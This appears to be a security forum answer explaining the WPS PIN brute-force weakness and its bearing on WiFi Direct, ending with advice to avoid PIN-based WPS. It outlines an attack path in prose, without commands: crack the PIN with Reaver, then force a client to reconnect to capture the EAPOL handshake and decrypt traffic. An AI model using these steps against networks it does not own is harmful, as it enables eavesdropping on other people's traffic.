As a preamble for other readers, note that the WPS vulnerability was made possible because of the way it was designed by the WiFi Alliance, not as a vulnerability with WPA2 itself. A good write-up on the WPS vulnerability is here. In a nutshell, the goal of it was originally to require 100,000,000 authentication attempts to brute-force the 8-digit pin, but the way it was implemented only used the first 7 parts of the pin, and only authenticated the 8-digit pin in halves (first 4 digits of the pin first, then the last 3 + checksum), effectively reducing the brute-force worst-case attempts to 11,000 (10^4 + 10^3).
So with WiFi Direct (also created by the WiFi Alliance), the goal is to get rid of the access point altogether and incorporate it into the computer. Essentially, the system's wireless NIC is able to act as both an AP and a bridge - a feature available in some third-party wireless NICs already (e.g., Alfa cards and their client software). Like you mentioned, the WPS setup occurs between two devices using WiFi Direct. If configured using the PIN-based WPS, then a non-physical attack with Reaver is possible. The other WPS methods (push-button, NFC) will require physical access to the device acting as an AP.
So let's say you've successfully attacked the PIN and retrieved it. "Would they be able to eavesdrop on and slurp the traffic of the session?" Yes, but it would still be encrypted. WiFi direct requires WPA2 or the "latest WiFi security." WPA2 encrypts every session dynamically using the extensible authentication protocol (EAP). If you've cracked the PIN with Reaver and gained access, your next move would be to disconnect and force a re-connect of the connected client. This will force a new exchange of the EAP keys (seen as EAPOL in Wireshark). I believe you need the first half of the four-way EAP handshake to properly decrypt the traffic, but preferably the first 3 or even all four of the packets. You'll need these EAP keys for every session you attempt to decrypt, and remember, every session between every client has a different EAP exchange. Otherwise, even with a cracked PIN, or some other method you use to gain access to the WPA2-protected network, you will still be unable to view the contents of the traffic.
"Would it yield a WPA2 key or passphrase that could be reused to attack the same workstation, set-top box, or whatever again and again?" Yes, if you've configured one. A successful Reaver crack will yield the WPA passphrase anyway.
How do I prevent this? As many people and sites have already pointed out, don't use PIN-based WPS. Go the inconvenient route, even with WiFi Direct, and use the traditional SSID and complex passphrase.
